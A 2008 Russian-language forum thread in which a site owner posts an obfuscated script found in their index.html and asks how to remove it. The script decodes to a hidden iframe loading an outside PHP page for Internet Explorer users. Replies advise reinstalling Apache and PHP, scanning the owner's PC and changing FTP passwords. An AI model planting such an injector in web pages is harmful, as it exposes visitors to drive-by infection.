URL: https://www.opennet.me/cgi-bin/openforum/vsluhboard.cgi
Форум: vsluhforumID1
Нить номер: 82724
[ Назад ]

Исходное сообщение
"Поймал какой-то вирус"

Отправлено Nexa4yxa , 06-Ноя-08 14:02 
всем привет. заблокировали сегодня мой сайт в подозрении на вирусы, когда начал просматривать index.html нашел в нем такой скрипт

<script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>

на одном из форумов сказали что это бэкдором заразили сервер с помощью пхп-шеллов. И поможет только зачистка всего сервера. Подскажите что мне делать? как убить этот вирус?


Содержание

Сообщения в этом обсуждении
"Поймал какой-то вирус"
Отправлено andreo , 06-Ноя-08 14:17 
>всем привет. заблокировали сегодня мой сайт в подозрении на вирусы, когда начал
>просматривать index.html нашел в нем такой скрипт
>
><script> var s='3C696672616D65207372633D22687474703A2F2F7777772E63656C6562726974796E796D70686F2E6
>36F6D2F73742F6E69636865732F7A2F7374617469632E70687022206865696768743D223222207374796
>C653D22646973706C61793A6E6F6E65222077696474683D2232223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} var v=navigator.userAgent.toLowerCase(); if (v.indexOf('msie') != -1 && v.indexOf('nt 6.') == -1){document.write(unescape(o));}</script>
>
>на одном из форумов сказали что это бэкдором заразили сервер с помощью
>пхп-шеллов. И поможет только зачистка всего сервера. Подскажите что мне делать?
>как убить этот вирус?

reinstall apache и php моно поробовать если движок не юзает бд
и поставить апач 2/x php 5


"Поймал какой-то вирус"
Отправлено Аноним , 06-Ноя-08 15:36 
Советчик блядь. :D

2топикстартер - проверь свой виндовой компьютер на вирусы. И поменяй пароли на фтп своих сайтов.